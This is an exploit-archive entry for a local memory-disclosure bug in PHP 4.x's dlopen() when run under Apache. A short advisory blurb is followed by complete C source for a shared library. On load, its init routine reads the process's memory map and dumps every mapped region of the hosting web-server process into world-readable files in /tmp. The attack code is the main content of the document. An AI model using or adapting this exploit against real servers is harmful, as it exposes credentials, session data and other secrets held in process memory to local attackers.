PHP 4.x - DLOpen Memory Disclosure (2)

EDB-ID:

23023

CVE:

N/A


Author:

andrewg

Type:

local


Platform:

PHP

Date:

2003-08-13


// source: https://www.securityfocus.com/bid/8405/info
 
A vulnerability has been reported to present itself in the dlopen() function contained in the PHP source. The issue occurs when PHP is used in conjunction with the Apache web server. A local attacker may exploit this issue to gain unauthorized access to potentially sensitive information.

/* 
 * http://felinemenace.org/ - Local PHP fun stuff - andrewg
 * Under linux, this will dump the processes memory into /tmp. Its useful for
 * several things.
 */

#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/ptrace.h>
#include <errno.h>

int bd_fd=0;

void trace(char *string)
{
	char buf[32];
	
	if(bd_fd == 0) {
		sprintf(buf, "/tmp/tracez.%d", getpid());
		bd_fd = open(buf, O_WRONLY|O_CREAT|O_TRUNC|O_SYNC, 0777);
		if(bd_fd == -1) {
			system("echo fscking damnit. unable to open file > /tmp/trace");
			exit(EXIT_FAILURE);
		}
	}
	write(bd_fd, string, strlen(string));
}

void _init()
{
	char cmd[1024], cmd2[1024];
	int fd;
	unsigned int start, stop;
	FILE *f;
	
	sprintf(cmd, "Starting up: pid %d\n", getpid());
	system("cat /proc/$PPID/maps > /tmp/t");
	trace(cmd);
	
	f = fopen("/proc/self/maps", "r");
	while(fgets(cmd2, sizeof(cmd2)-1, f)) {
		trace("read: ");
		trace(cmd2);
		sscanf(cmd2,"%08x-%08x \n", &start, &stop);
		sprintf(cmd, "\nStart: %p, Stop: %p\n", start, stop);
		trace(cmd);
		sprintf(cmd, "/tmp/memdump.%p", start);
		trace("saving data to ");
		trace(cmd);
		trace("\n");
		if((fd = open(cmd, O_WRONLY|O_CREAT|O_TRUNC, 0777)) < 0) {
			trace("Unable to open file.\n");
		} else {
			write(fd, start, stop - start);
			close(fd);
		}
	}

	fclose(f);
	
	trace("\n--> should be done now\n");
	
}

void _fini()
{
	close(bd_fd);
}